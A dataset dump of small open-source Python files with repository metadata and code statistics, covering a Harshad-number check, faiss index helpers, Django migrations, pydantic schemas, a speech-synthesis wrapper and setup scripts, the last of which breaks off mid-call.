| 26.937984 | 97 | 0.636835 | 427 | 3,475 | 4.985948 | 0.224824 | 0.067168 | 0.046031 | 0.055895 | 0.662752 | 0.616721 | 0.483326 | 0.394082 | 0.355566 | 0.355566 | 0 | 0.001436 | 0.198273 | 3,475 | 128 | 98 | 27.148438 | 0.762742 | 0.018705 | 0 | 0.416667 | 0 | 0 | 0.20558 | 0.106902 | 0.02381 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.059524 | null | null | 0.02381 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f9d6fb07fd37fbb906d2b22ed6f41821f271822 | 198 | py | Python | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | #To run the code, write
#from ishashad import ishashad
#then ishashad(number)
def ishashad(n):
if n % sum(map(int,str(n))) == 0:
print("True")
else:
print("False")
return | 18 | 37 | 0.60101 | 29 | 198 | 4.103448 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.252525 | 198 | 11 | 38 | 18 | 0.797297 | 0.363636 | 0 | 0 | 0 | 0 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
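The ishashad helper above prints its result; a small, hypothetical variant that returns a boolean (easier to reuse and test) could look like this — the function name is illustrative and not part of the original file:
def is_harshad(n):
    """Return True if n is divisible by the sum of its digits (a Harshad number)."""
    digit_sum = sum(int(d) for d in str(abs(n)))
    return digit_sum != 0 and n % digit_sum == 0

assert all(is_harshad(n) for n in (1, 10, 12, 18, 21))  # known Harshad numbers
assert not is_harshad(11)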
6fa203b91e4061ab9a5aeb13af78a9c24d505f2c | 785 | py | Python | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 22 | 2019-01-13T12:56:56.000Z | 2020-11-03T01:39:20.000Z | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | null | null | null | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 5 | 2019-04-01T09:19:55.000Z | 2020-05-26T14:38:06.000Z | # -*- coding: utf-8 -*-
"""
File Name: faiss_utils
   Description : faiss utility helpers
Author : mick.yi
date: 2019/1/4
"""
import faiss
import numpy as np
def get_index(dimension):
sub_index = faiss.IndexFlatL2(dimension)
index = faiss.IndexIDMap(sub_index)
return index
def update_multi(index, vectors, ids):
"""
:param index:
:param vectors:
:param ids:
:return:
   Note: may raise "ValueError: array is not C-contiguous" if the arrays are not C-contiguous.
"""
idx = np.argsort(ids)
    # remove any existing entries for these ids first, then add the new vectors
index.remove_ids(ids[idx])
index.add_with_ids(vectors[idx], ids[idx])
def update_one(index, vector, label_id):
vectors = np.expand_dims(vector, axis=0)
ids = np.array([label_id])
update_multi(index, vectors, ids)
| 21.216216 | 47 | 0.602548 | 100 | 785 | 4.6 | 0.54 | 0.034783 | 0.069565 | 0.1 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.277707 | 785 | 36 | 48 | 21.805556 | 0.795414 | 0.280255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
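A hedged usage sketch for the helpers above; the dimension, vectors and ids are invented for illustration, and it assumes the faiss package (e.g. faiss-cpu) is installed. faiss expects float32, C-contiguous vectors and int64 ids, which is what the C-contiguous note in update_multi refers to:
import numpy as np
import faiss

dimension = 128
index = faiss.IndexIDMap(faiss.IndexFlatL2(dimension))  # same structure that get_index() builds

# Fabricated example data: float32, C-contiguous vectors with int64 ids.
vectors = np.ascontiguousarray(np.random.rand(10, dimension).astype('float32'))
ids = np.arange(10, dtype='int64')
index.add_with_ids(vectors, ids)

# Nearest-neighbour lookup for the first vector; its own id should come back first.
distances, neighbours = index.search(vectors[:1], 3)
print(neighbours[0])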
6fa21afd208bf7323dcf7c8f05508069120736b0 | 475 | py | Python | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 1 | 2021-05-29T23:43:36.000Z | 2021-05-29T23:43:36.000Z | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | null | null | null | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 2 | 2021-06-01T01:36:01.000Z | 2021-06-01T01:36:59.000Z | class Relogio:
def __init__(self):
self.horas = 6
self.minutos = 0
self.dia = 1
def __str__(self):
return f"{self.horas:02d}:{self.minutos:02d} do dia {self.dia:02d}"
def avancaTempo(self, minutos):
self.minutos += minutos
while(self.minutos >= 60):
self.minutos -= 60
self.horas += 1
if self.horas >= 24:
self.horas = 0
self.dia +=1
| 23.75 | 75 | 0.492632 | 57 | 475 | 3.964912 | 0.368421 | 0.292035 | 0.070796 | 0.079646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062069 | 0.389474 | 475 | 19 | 76 | 25 | 0.717241 | 0 | 0 | 0 | 0 | 0.066667 | 0.120507 | 0.073996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.066667 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa2c35d5d796a2e58e703cd256e4f54f2acff9f | 432 | py | Python | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | null | null | null | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | 2 | 2021-06-08T20:56:16.000Z | 2021-09-08T01:41:42.000Z | users/migrations/0004_auto_20191028_2154.py | icnmtrx/classified | c9515352e046293dacd66ba28cb32ae378edf832 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-10-28 21:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20191028_1802'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='registered_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='date_registered'),
),
]
| 22.736842 | 90 | 0.62963 | 48 | 432 | 5.479167 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096875 | 0.259259 | 432 | 18 | 91 | 24 | 0.725 | 0.104167 | 0 | 0 | 1 | 0 | 0.163636 | 0.05974 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa4cb77b9686bd974f4ba0799278420d18f452c | 1,928 | py | Python | fewshot/models/basic_model_VAT_ENT.py | AhmedAyad89/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 22 | 2019-03-13T02:19:17.000Z | 2021-08-06T03:13:00.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 1 | 2019-07-27T14:33:02.000Z | 2020-06-01T11:03:20.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 5 | 2019-03-07T06:18:51.000Z | 2019-10-22T05:33:23.000Z | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import tensorflow as tf
from fewshot.models.kmeans_utils import compute_logits
from fewshot.models.model import Model
from fewshot.models.refine_model import RefineModel
from fewshot.models.basic_model_VAT import BasicModelVAT
from fewshot.models.model_factory import RegisterModel
from fewshot.models.nnlib import (concat, weight_variable)
from fewshot.utils import logger
from fewshot.utils.debug import debug_identity
from fewshot.models.SSL_utils import *
l2_norm = lambda t: tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))
log = logger.get()
@RegisterModel("basic-VAT-ENT")
class BasicModelVAT_ENT(BasicModelVAT):
def get_train_op(self, logits, y_test):
loss, train_op = BasicModelVAT.get_train_op(self, logits, y_test)
config = self.config
ENT_weight = config.ENT_weight
VAT_ENT_step_size = config.VAT_ENT_step_size
logits = self._unlabel_logits
s = tf.shape(logits)
s = s[0]
p = tf.stop_gradient(self.h_unlabel)
affinity_matrix = compute_logits(p, p) - (tf.eye(s, dtype=tf.float32) * 1000.0)
# logits = tf.Print(logits, [tf.shape(point_logits)])
ENT_loss = walking_penalty(logits, affinity_matrix)
loss += ENT_weight * ENT_loss
ENT_opt = tf.train.AdamOptimizer(VAT_ENT_step_size * self.learn_rate, name="Entropy-optimizer")
ENT_grads_and_vars = ENT_opt.compute_gradients(loss)
train_op = ENT_opt.apply_gradients(ENT_grads_and_vars)
for gradient, variable in ENT_grads_and_vars:
if gradient is None:
gradient = tf.constant(0.0)
self.adv_summaries.append(tf.summary.scalar("ENT/gradients/" + variable.name, l2_norm(gradient), family="Grads"))
self.adv_summaries.append(tf.summary.histogram("ENT/gradients/" + variable.name, gradient, family="Grads"))
self.summaries.append(tf.summary.scalar('entropy loss', ENT_loss))
return loss, train_op
| 33.824561 | 116 | 0.769191 | 287 | 1,928 | 4.923345 | 0.355401 | 0.070064 | 0.084218 | 0.029724 | 0.104742 | 0.079264 | 0.035386 | 0 | 0 | 0 | 0 | 0.007738 | 0.128631 | 1,928 | 56 | 117 | 34.428571 | 0.833333 | 0.026452 | 0 | 0 | 0 | 0 | 0.042712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.307692 | 0 | 0.384615 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6fa85d4b0b5bfa6ac386b4e088bb46a5cbd9b94a | 614 | py | Python | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
from aip import AipSpeech
from config import DefaultConfig as opt
class composer():
def __init__(self):
pass
def compose(self,text ='你好'):
        # Secret keys obtained from the Baidu developer console
APP_ID = opt.baidu_app_id
API_KEY = opt.baidu_api_key
SECRET_KEY =opt.baidu_secret_key
client = AipSpeech(APP_ID, API_KEY, SECRET_KEY)
result = client.synthesis(text,'zh',1,{
'vol':5,})
file_name = 'ans.mp3'
if not isinstance(result, dict):
with open(file_name, 'wb') as f:
f.write(result)
return file_name
| 26.695652 | 55 | 0.583062 | 82 | 614 | 4.146341 | 0.597561 | 0.044118 | 0.047059 | 0.064706 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001629 | 0.009524 | 0.315961 | 614 | 22 | 56 | 27.909091 | 0.797619 | 0.039088 | 0 | 0 | 0 | 0 | 0.027257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa9d472e775eb87721d162cdd4f797206aefbc8 | 264 | py | Python | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | 3 | 2017-01-05T20:02:23.000Z | 2017-10-02T19:55:58.000Z | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | 1 | 2016-05-17T20:20:19.000Z | 2016-05-17T20:20:28.000Z | scripts/makeToast.py | zgrannan/Technical-Theatre-Assistant | 8928e5f4f179f75f92035e898d102dd55f32e3f3 | [
"MIT"
] | null | null | null | #makes a toast with the given string ID
from sys import argv
def make_toast (string_id):
return "Toast.makeText(getBaseContext(), getString(R.string." + string_id + "), Toast.LENGTH_SHORT).show();"
if ( argv[0] == "makeToast.py" ):
print make_toast(argv[1])
| 24 | 109 | 0.708333 | 40 | 264 | 4.55 | 0.7 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008811 | 0.140152 | 264 | 10 | 110 | 26.4 | 0.792952 | 0.143939 | 0 | 0 | 0 | 0 | 0.419643 | 0.263393 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.2 | null | null | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fab9608b18da127d6b2008d803781b981e8468d | 334 | py | Python | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | crisiscleanup/calls/migrations/0011_merge_20180122_2308.py | CrisisCleanup/wcicp-call-service | 0a00e092625e2a48c9807737a4b72e343e1ab0b9 | [
"Apache-1.1"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-01-22 23:08
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('calls', '0010_auto_20180119_2117'),
('calls', '0007_auto_20180122_2157'),
]
operations = [
]
| 19.647059 | 48 | 0.658683 | 41 | 334 | 5.097561 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187023 | 0.215569 | 334 | 16 | 49 | 20.875 | 0.610687 | 0.203593 | 0 | 0 | 1 | 0 | 0.212928 | 0.174905 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fb000a6fd5b519a73bbb7413dd210206c96960d | 370 | py | Python | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | # https://www.geeksforgeeks.org/write-a-program-to-reverse-an-array-or-string/
# Time: O(n)
# Space: O(1)
def reverseByMiddles(arr):
n = len(arr)
limit = n//2
for i in range(limit):
temp = arr[i]
arr[i] = arr[(n-1)-i]
arr[(n-1)-i] = temp
return arr
arr = [1,2,3]
result = reverseByMiddles(arr)
print(result)
print(reverseByMiddles(arr = [1,2,3,4]))
| 18.5 | 78 | 0.627027 | 64 | 370 | 3.625 | 0.53125 | 0.24569 | 0.060345 | 0.051724 | 0.056034 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036066 | 0.175676 | 370 | 19 | 79 | 19.473684 | 0.72459 | 0.259459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
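For comparison, the same in-place reversal can be written with Python's parallel assignment, and a reversed copy with slicing; this is a generic sketch, not code from the repository above:
def reverse_in_place(arr):
    left, right = 0, len(arr) - 1
    while left < right:
        arr[left], arr[right] = arr[right], arr[left]  # swap without a temporary variable
        left += 1
        right -= 1
    return arr

assert reverse_in_place([1, 2, 3, 4]) == [4, 3, 2, 1]
assert [1, 2, 3][::-1] == [3, 2, 1]  # slicing builds a reversed copy instead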
6fbe42378fbc286f445856d3f64bebf5d1265f7a | 1,173 | py | Python | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 43 | 2020-12-14T18:19:15.000Z | 2022-03-30T05:57:43.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 3 | 2021-02-19T09:56:35.000Z | 2022-03-30T13:26:50.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 16 | 2020-12-14T02:49:35.000Z | 2022-02-15T10:39:39.000Z | from pydantic import BaseModel, Field, EmailStr
class PostSchema(BaseModel):
id: int = Field(default=None)
title: str = Field(...)
content: str = Field(...)
class Config:
schema_extra = {
"example": {
"title": "Securing FastAPI applications with JWT.",
"content": "In this tutorial, you'll learn how to secure your application by enabling authentication using JWT. We'll be using PyJWT to sign, encode and decode JWT tokens...."
}
}
class UserSchema(BaseModel):
fullname: str = Field(...)
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"fullname": "Abdulazeez Abdulazeez Adeshina",
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
class UserLoginSchema(BaseModel):
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
| 27.27907 | 191 | 0.535379 | 107 | 1,173 | 5.841122 | 0.53271 | 0.064 | 0.0624 | 0.0912 | 0.3856 | 0.3856 | 0.2608 | 0.2016 | 0.2016 | 0.2016 | 0 | 0 | 0.341006 | 1,173 | 42 | 192 | 27.928571 | 0.808538 | 0 | 0 | 0.5 | 0 | 0.029412 | 0.30179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.117647 | 0.029412 | 0 | 0.441176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
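A short usage sketch for the schemas above (pydantic v1 style, matching the Field(...) declarations); the import path and payload values are assumptions for illustration, and EmailStr validation needs the email-validator extra installed:
from pydantic import ValidationError

from app.model import UserSchema  # assumed import path, given the file lives at app/model.py

user = UserSchema(fullname="Jane Doe", email="jane@example.com", password="s3cret")
print(user.dict())

try:
    UserSchema(fullname="Jane Doe", email="not-an-email", password="x")
except ValidationError as exc:
    print(exc.errors()[0]["loc"])  # ('email',) -- EmailStr rejects malformed addresses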
6fc58731a5e67b957a08a7b99ed3506623297e19 | 301 | py | Python | vk_bot/mods/other/counting.py | triangle1984/GLaDOS | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 3 | 2019-12-12T05:48:34.000Z | 2020-12-07T19:23:41.000Z | vk_bot/mods/other/counting.py | anar66/vk-bot | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 1 | 2019-11-15T14:28:49.000Z | 2019-11-15T14:28:49.000Z | vk_bot/mods/other/counting.py | triangle1984/vk-bot | 39dea7bf8043e791ef079ea1ac6616f95d5b5312 | [
"BSD-3-Clause"
] | 5 | 2019-11-20T14:20:30.000Z | 2022-02-05T10:37:01.000Z | from vk_bot.core.modules.basicplug import BasicPlug
import time
class Counting(BasicPlug):
command = ("отсчет",)
doc = "Отсчет от 1 до 3"
def main(self):
for x in range(3, -1, -1):
if x == 0:
return
self.sendmsg(x)
time.sleep(1)
| 25.083333 | 51 | 0.538206 | 41 | 301 | 3.926829 | 0.707317 | 0.186335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.348837 | 301 | 11 | 52 | 27.363636 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.07309 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6fc63d77d8ed73c401918b676d06084cc00b6c87 | 954 | py | Python | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-07T15:56:24.000Z | 2022-02-07T15:56:24.000Z | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-18T01:23:46.000Z | 2022-02-18T01:23:46.000Z | ## Copyright © 2021, Oracle and/or its affiliates.
## Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#!/usr/bin/env python
from setuptools import setup
setup(name='wind-marketplace-library',
version="1.0.0",
description='Robot Framework test library for OCI Marketplace',
long_description='Robot Framework test library for OCI Marketplace',
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Framework :: WIND Robot Framework',
],
author='arun.poonia@oracle.com',
author_email='arun.poonia@oracle.com',
packages=['MarketplaceLibrary'],
license = "UPL-1.0",
install_requires=[
],
extras_require={
'dev': [
]
},
platforms='any',
include_package_data=True,
zip_safe=False) | 31.8 | 105 | 0.634172 | 108 | 954 | 5.546296 | 0.685185 | 0.010017 | 0.083472 | 0.096828 | 0.176962 | 0.176962 | 0.176962 | 0.176962 | 0 | 0 | 0 | 0.018006 | 0.243187 | 954 | 30 | 106 | 31.8 | 0.810249 | 0.179245 | 0 | 0.083333 | 0 | 0 | 0.429306 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fc8809070d19daecb0e75b0cf66f5240983ed79 | 1,392 | py | Python | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 8 | 2019-08-27T20:08:22.000Z | 2021-07-23T22:49:47.000Z | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 73 | 2020-03-11T18:07:29.000Z | 2022-03-28T18:07:47.000Z | api/views.py | oil-rope/oil-and-rope | 6d59c87d4809f120417a90c1624952085486bb06 | [
"MIT"
] | 4 | 2020-02-22T19:44:17.000Z | 2022-03-08T09:42:45.000Z | from django.http import JsonResponse
from django.shortcuts import reverse
from django.urls import NoReverseMatch
from django.views import View
from rest_framework import __version__ as drf_version
from rest_framework.exceptions import ValidationError
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from oilandrope import __version__
class ApiVersionView(View):
http_method_names = ['get']
data = {
'version': __version__,
'powered_by': 'Django Rest Framework',
'drf_version': drf_version,
}
def get(self, request, *args, **kwargs):
return JsonResponse(self.data)
class URLResolverViewSet(ViewSet):
"""
Returns URL with given resolver and params.
"""
permission_classes = [AllowAny]
def resolve_url(self, request, *args, **kwargs):
data = request.data.copy()
if 'resolver' not in data:
raise ValidationError()
resolver = data.pop('resolver')
if isinstance(resolver, list):
resolver = resolver[0]
extra_params = {}
for key, value in data.items():
extra_params[key] = value
try:
url = reverse(resolver, kwargs=extra_params)
except NoReverseMatch:
url = '#no-url'
return Response({'url': url})
| 27.294118 | 56 | 0.66954 | 155 | 1,392 | 5.832258 | 0.425806 | 0.086283 | 0.094027 | 0.04646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000951 | 0.244253 | 1,392 | 50 | 57 | 27.84 | 0.858365 | 0.030891 | 0 | 0 | 0 | 0 | 0.058515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0.027778 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
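A hypothetical urls.py entry showing how views like these are typically wired up; the route paths and names are illustrative only, not taken from the repository:
from django.urls import path

from api.views import ApiVersionView, URLResolverViewSet  # assumed import path

urlpatterns = [
    path("api/version/", ApiVersionView.as_view(), name="api-version"),
    # A ViewSet method can be bound explicitly instead of going through a router:
    path("api/resolver/", URLResolverViewSet.as_view({"post": "resolve_url"}), name="api-resolver"),
]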
6fdb320f11ce21ba2207772e25516617a4f09f64 | 310 | py | Python | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 12 | 2015-07-28T15:31:51.000Z | 2019-03-03T23:39:10.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 4 | 2017-01-25T05:24:17.000Z | 2019-04-03T00:25:13.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 33 | 2015-01-07T10:01:28.000Z | 2020-07-26T08:22:53.000Z | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from setuptools import setup
import setuptools
setup(
name='contrail-server-manager',
version='0.1dev',
packages=setuptools.find_packages(exclude=["*.pyc"]),
zip_safe=False,
